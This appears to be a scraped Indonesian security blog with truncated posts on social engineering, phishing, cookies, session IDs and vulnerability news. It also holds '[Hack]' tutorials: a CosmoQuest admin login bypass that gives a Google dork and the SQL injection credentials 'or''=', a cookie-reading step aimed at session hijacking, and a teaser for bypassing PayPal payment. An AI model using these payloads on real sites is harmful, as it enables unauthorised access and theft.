Beberapa hari yang lalu saya telah menuliskan tentang memahami social engineering II yang di dalamnya tedapat beberapa contoh social engineering melalui interaksi sosial sebagai salah satu jenis social engineering. Sementara itu untuk jenis kedua, yaitu menggunakan komputer atau piranti elektronik/digital lain sebagai alat bantu, cukup banyak modus operandi yang sering dipergunakan seperti:

Skenario 1 : Teknik Phishing – melalui Email

Strategi ini adalah yang paling banyak dilakukan di negara berkembang seperti Indonesia. Biasanya si penjahat menyamar sebagai pegawai atau karyawan sah yang merepresentasikan bank. Email yang dimaksud berbunyi misalnya sebagai berikut:

“Pelanggan Yth. Sehubungan sedang dilakukannya upgrade sistem teknologi informasi di bank ini, maka agar anda tetap mendapatkan pelayanan perbankan yang prima, mohon disampaikan kepada kami nomor rekening, username, dan password anda untuk kami perbaharui. Agar aman, lakukanlah dengan cara me-reply electronic mail ini. Terima kasih atas perhatian dan koordinasi anda sebagai pelanggan setia kami.

Memahami Social Engineering II

Seperti janji saya pada posting sebelumya, kali ini saya akan memberikan beberapa contoh tenik social engineering yang kerap digunakan oleh seseorang tanpa kita sadari bisa terjebak di dalamnya.

Sebelumya sudah saya tuliskan, bahwa jenis social engineering dibagi menjadi dua, yaitu melalui interaksi sosial dan melalui interaksi komputer.

Skenario 1 : Kedok sebagai User Penting

Seorang penipu menelpon help desk bagian divisi teknologi informasi dan mengatakan hal sebagai berikut “Halo, di sini pak Abraham, Direktur Keuangan. Saya mau log in tapi lupa password saya. Boleh tolong beritahu sekarang agar saya dapat segera bekerja?”.

Karena takut – dan merasa sedikit tersanjung karena untuk pertama kalinya dapat berbicara dan mendengar suara Direktur Keuangan perusahaannya – yang bersangkutan langsung memberikan password yang dimaksud tanpa rasa curiga sedikitpun.

Si penipu bisa tahu nama Direktur Keuangannya adalah Abraham karena melihat dari situs perusahaan.

Memahami Social Engineering

Sebuah kutipan dari dunia jaringan mengatakan “the strength of a chain depends on the weakest link” atau dalam bahasa Indonesia berarti "kekuatan sebuah rantai tergantung pada sambungan terlemah".

Pertanyaannya, apa/siapa the weakest link/sambungan terlemah itu dalam sistem jaringan komputer?

Jawabanya adalah manusia. Ya, manusia adalah komponen terlemah dalam suatu sistem jaringan komputer.

Walaupun sebuah sistem telah dilindungi menggunakan hardware tercanggih, software terpintar, firewall, antivirus, IDS/IPS, dan lain sebagainya - tapi jika manusia yang mengoperasikanya lalai, maka semua piranti itu tidak akan berarti. Para  pelaku cybercrime paham betul dengan hal ini, sehingga mereka mulai menggunakan teknik tertentu yang dinamakan social engineering atau yang lebih akrab disebut "soceng" yang bertujuan untuk mendapatkan informasi penting yang secara rahasia diketahui oleh manusia.

Memahami Captcha


Tentunya anda pernah, saat akan mengirim komentar/download/sign up/sign in pada suatu situs disitu terdapat kode verifikasi/captcha yang harus diisikan kedalam sebuah kolom. Menyebalkan bukan? apalagi jika kode tersebut sangat membingungkan. Memang, untuk user - captcha hanya hal sepele yang menyebalkan, tapi bagi si pemlik situs - captcha sangatlah penting, tujuanya untuk membedakan apakah user tersebut benar-benar manusia atau komputer (bot) yang hanya bermaksud melakukan hal yang merugikan bagi situs tersebut, misalnya spammer.

Banyak orang menganggap jika situsnya dijaga oleh captcha, maka spammer tidak akan bisa menembusnya. Ini salah besar, captcha memang meyulitkan, tapi bila captcha tidak dibuat dengan benar dan asal-asalan, maka spammer bisa dengan mudah menembusnya.

Bahaya Menggunakan Proxy

Tadi siang waktu nunggu jeda kuliah, saya bingung mau kemana, mau ngapain. Akhirnya bersama Ryan, saya main ke kost teman saya Si Rizal yang tempatnya persis dibelakang kampus. Sampai disana tiba-tiba Si empunya kos, Rizal, bertanya ke Ryan tentang bagaimana menggunakan proxy, kemudian Ryan menyarankanya ke sebuah situs proxy yang saya lupa namanya.

Mendengar percakapan itu saya langsung teringat dengan sebuah artikel yang pernah saya baca. Disitu di jelaskan tentang bahaya yang kita tanggung saat menggunakan proxi.

Memang benar, dengan menggunakan proxy anda dapat mengakses situs yang diblokir dan juga menjamin anonimitas. Namun hal tersebut harus anda bayar dengan mempertaruhkan keamanan informasi/data yang anda akses (resiko).

Berikut ini saya tunjukan potongan header yang terjadi saat saya mencoba login ke account Gmail saya menggunakan salah satu web proxy asal inggris.

Cara Mengetahui Komputer Laki-laki Atau Perempuan

Posting kali ini hanyalah untuk simple funny saja, dimana anda akan mengetahui apakah komputer anda laki-laki atau perempuan.

Sebenarnya trik ini sudah lama digunakan, tapi bila anda tidak mengetahuinya: apakah komputer anda laki-laki atau perempuan, silahkan downloah pada link dibawah ini:

Computer gender

Software kecil diatas dibuat dalam format .vbs dan Untuk menggunakanya anda hanya perlu mengeksekusinya lalu dengarkan apakah suara tersebut suara laki-laki atau perempuan.

Apabila yang anda dengar adalah suara laki-laki, maka komputer anda laki-laki. Sedangkan bila yang anda dengar suara perempuan, maka selamat, anda laki-laki yang beruntung (jika anda laki-laki seperti saya) karena komputer anda perempuan. :)

WordPress 3.1.1 Rilis dengan Perbaikan Vulnerability

Development team WordPress telah merilis versi 3.1.1 dari platfrom blog publishing dalam rangka mengatasi beberapa stabilitas dan isu keamanan.

Secara keseluruhan, WordPress 3.1.1 mengalami hampir tiga puluh perbaikan bug termasuk tiga vulnerability (baca: kerentanan) yang ditemukan oleh core developers: Jon Cave dan Peter Westwood.

Sebuah bug terletak pada komponen media uploader dan proteksi bypass cross-site request forgery (CSRF). Hal ini diselesaikan dengan menambahkan beberapa nonce checks pada kode.

Jenis vulnerability ini memungkinkan attacker melakukan session hijacking pada user yang sah dengan memaksa browser mereka untuk melakukan tindakan tidak sah ketika membuka sebuah link jahat yang dirancang khusus.

Profile Spy Scam Menyerang Twitter

Peneliti keamanan memperingatkan adanya sebuah scam berupa survei pada Twitter yang menjanjikan user dapat melihat pengunjung profil mereka.

Menurut Robert Graham dari Errata Security, post spam tersebut berbunyi "94 people viewed my profile today!" diikuti dengan "Wow! See who viewed your twitter with Profile Spy [link]"

Dengan meng-klik link tersebut, user akan diarahkan ke halaman yang meminta sebuah aplikasi yang disebut "Profil Spy" agar terhubung ke profil mereka.

Aplikasi ini sebenarnya digunakan untuk penipuan, dan jika di-"allow", dia akan mulai mengirim spam dari account korban tanpa meninta izin (lagi).

User yang setuju untuk terhubung dengan aplikasi tersebut akan diarahkan ke halaman yang meminta mereka untuk berpartisipasi dalam survei yang diduga untuk pemeriksaan keamanan/security check.

[Hack] Step by Step Bypass Halaman Login CosmoQuest

Menanggapi saran teman saya Hermawan Ramadhan tadi sore yang menyarankan untuk membuat posting yang "jelas" agar dapat dimengerti oleh newbie, kali ini saya akan menjelaskan bagaimana mem-bypass halaman login admin sebuah situs yang disuport oleh CosmoQuest yang saya ambil dari posting saya sebelumnya: CosmoQuest bypass login page Vulnerability.

Catatan: sebelum melangkah lebih jauh, baca dulu halaman disclaimer.

Lanjut, pertama anda harus masuk ke google untuk mencari situs target menggunakan keyword/dork: "Powered by CosmoQuest".







[Hack] CosmoQuest bypass login page Vulnerability

Title       : CosmoQuest bypass login page Vulnerability
Author    : Net.Edit0r
Vendor or Software Link  : http://www.cosmoquest.info/
Date  : 2011-03-29
Google dork : Powered by CosmoQuest
Category :  [Webapps]
Vulnerable File : AdminLogin.asp

Exploit: http://website_target/AdminLogin.asp

user: 'or''='
pass: 'or''='

XSS Vulnerability pada 1.61.channel.facebook.com

02/04/2011 - Edgard Charmmas, seorang peneliti keamanan, telah menyampaikan adanya XSS vulnerability pada Facebook (1.61.channel.facebook.com). Hal ini bertepatan dengan penyerahan website peringkat 2 menurut Alexa.

Secara manual kita dapat menguji vulnerability tersebut yang sampai hari ini (05/04/2011) masih belum juga dibenahi.

Saat mencoba membuka http://1.61.channel.facebook.com/ anda hanya akan melihat tulisan I'll find something to put here. Sedangkan anda dapat mengujinya dengan menambahkan sedikit code seperti dibawah ini:

Memahami Session ID

Ini adalah lanjutan dari artikel saya sebelumya yang membahas tentang apa itu cookie dan bagaimana cara kerjanya. Apabila anda belum mengetahui apa itu cookie, saya sarankan untuk membacanya terlebih dahulu karena session dan cookie merupakan dua hal yang saling berhubungan.

Seperti yang kita tahu, cookie memberikan informasi user kepada server untuk kemudian disahkan oleh server. Ingat ilustrasi mahasiswa yang mengajukan beasiswa, anggap saja session id adalah stempel/tanda tangan yang diberikan khusus kepada user oleh server.

Ketika user pertama kali masuk ke sebuah situs, server akan memberikan sebuah kode unik berupa session id. Ketika server menerima request dari user yang membawa session id, server akan memeriksa apakah session id itu valid. Jika session id valid, maka server yakin bahwa request ini datang dari “returning visitor” bukan orang asing.

Memahami Authentication dan Authorization

Sebelum anda melangkah lebih jauh kedalam dunia security, ada baiknya terlebih dulu anda memahami apa itu authentication dan authorization karena semua proses security berpusat pada kedua hal itu.

Banyak orang yang masih bingung, mengira bahwa authentication sama dengan authorization, padahal keduanya sangat berbeda.

Mengutip pernyataan Mas Rizki Wicaksono dari salah satu websitenya yang menyebutkan bahwa "salah satu tujuan dari security adalah menjamin agar resource hanya boleh diakses oleh orang yang berhak dan orang yang berhak itu bisa mengakses resource tanpa halangan". Karenanya penyedia layanan membutuhkan kedua hal di atas supaya dapat memberikan layanannya kepada pengguna yang sah dengan tepat.

[Hack] Bypass Pembayaran Paypal Untuk Mendapatkan Ebook Gratis

Jika anda suka berburu ebook atau software tentunya anda penah menemukan suatu halaman download yang sangat menarik tapi untuk mendownloadnya anda diharuskan membayar lewat Paypal.


Nah, disini saya akan sharing bagaimana cara mendowload ebook tersebut tanpa harus melakukan pembayaran.

Menggunakan Google 2-Step Verification/Authentication pada Gmail

Sebenarnya sudah cukup lama saya mengetahui adanya fitur "Using 2-step verification" pada account Google, tapi baru kali ini saya coba menggunakanya.  Setelah mencoba fitur tersebut dan menggunakanya pada account saya, 2-step verification (saya lebih suka menggunakan kata "authentication") pada Gmail adalah salah satu keamanan web login terbaik dan saya sangat menyarankan untuk mengaktifkan fitur ini pada account Google anda. 

Google Menggunakan 2-Step Authentication pada Gmail

Sebelumnya banyak diskusi tentang "Multi-steped authentication", dimana gambar password dianggap sebagai salah satu bagianya. Tapi Goolge membuktikan kesalahan pada diskusi tersebut dengan mengimplementasikan code verifikasi melalui handphone sebagai tahap authentication kedua. Jadi jika hacker mengetahui password Gmail anda, dia tidak dapat login ke account Gmail anda karena fitur 2-step authentication.

Database MySQL.com Dihack Menggunakan SQL Injection

Hacker telah menyerang database MySQL.com, seperti bahasa Perancis, Jerman, Italia, Jepang dan versi lokal lainya pada website tersebut. Ironisnya itu dilakukan dengan meng-exploit vulnerability SQL Injection.

Seorang hacker yang menyebut dirinya Jackh4x0r mengungkapkan dengan mempublikasikan laporannya  di mailing list terkenal.

Laporan ini mencakup informasi tentang parameter vulnerability (baca: kerentanan), daftar tabel dari beberapa data base dan daftar pengguna database dengan password dalam hash.

Tidak lama kemudian, hacker Romania, TinKode menerbitkan laporan yang lebih lengkap di blognya dam mengklaim bahwa dia dan seorang temannya yang menemukan vulnerability tersebut beberapa bulan yang lalu dan menyatakan bahwa seharusnya itu tidak dipublikasikan.

McAfee: Rahasia Perdagangan Perusahaan Menjadi Target Para Penjahat Cyber

Menurut laporan terbaru dari McAfee dan SAIC, kejahatan dalam dunia maya atau cybercrime semakin banyak bergerak hanya untuk mencuri data pribadi rahasia perdagangan dan modal perusahaan intelek lainya menjadikan mereka dengan mudah dapat menjualnya di pasar gelap.

Dalam studi baru yang rilis hari ini (28/3 PDT), "Ekonomi Underground: Intellectual Capital and Sensitive Corporate Data Now the Latest Cybercrime Currency" (PDF), McAfee dan Science Applications International Corporate menemukan adanya pencurian rahasia perdagangan, rencana pemasaran, data R&D, dan bahkan source code tengah meningkat. Terutama karena informasi tersebut sering tidak terlindungi.

Berdasarkan survei global profesional IT, laporan tersebut menemukan sejumlah temuan.

Memahami Cookies

Begitu banyak tutorial hacking yang menjelaskan tentang XSS, SQLi dan sejenisnya, tapi saya lihat hanya sedikit artikel yang menjelaskan tentang cookie sebagai salah satu media dan juga resiko keamanan. 

Disini saya akan membahas mengenai apa itu cookie, bagaimana cookie digunakan, apa saja resiko yang dapat ditimbukan dan bagaimana memanfaatkanya.

Saat anda, sebagai mahasiswa suatu perguruaan tinggi ingin mengajukan beasiswa anda akan dimintai surat keterangan sebagai mahasiswa aktif di perguruan tinggi tersebut sebagai salah satu syarat untuk mendapatkan beasiswa. Surat keterangan itu berisi nama, nomor mahasiswa, jurusan dan lain-lain yang semuanya anda isi sendiri kemudian surat itu diberikan kepada lembaga tertentu di perguruan tinggi tersebut untuk dicek kebenarannya. Jika data yang anda isikan benar, surat tersebut akan dinyatakan sah dengan ditandatangani oleh pihak yang bersangkutan dan diberikan stempel perguruan tinggi.

[Hack] Session Hijacking pada Account Yahoo - Stealing Cookies

Sebelum membaca tutorial ini saya anggap anda sudah mengetahui apa itu session hijacking, stealing cookies dan cookies itu sendiri sekarang anda dapat mencoba melakukan stealing cookies pada account Yahoo.

Pertama silahkan masuk ke www.yahoo.com lalu ketikan kode berikut pada address bar:

javascript:alert(document.
cookie);

Anda akan mendapatkan kotak yang menampilkan pop up cookie yang ditinggalkan Yahoo pada PC anda.

Sekarang login ke account Yahoo anda lalu lakukan hal yang sama seperti diatas. Anda akan melihat beberapa elemen tambahan yang ada pada cookie. Itulah session id anda. Jadi sekarang anda tahu bahwa Yahoo menyimpan session id dalam bentuk cookie pada web browser.
Attacker dapat mencuri session dengan cara meyakinkan korban untuk mengeksekusi sebuah kode dalam browsernya. Kemudian attacker menggunakan session yang dicuri untuk masuk kedalam account korban tanpa perlu memberikan username ataupun password. Serangan ini jarang dilakukan karena saat korban sign out dari accountnya maka attacker juga ikut sign out.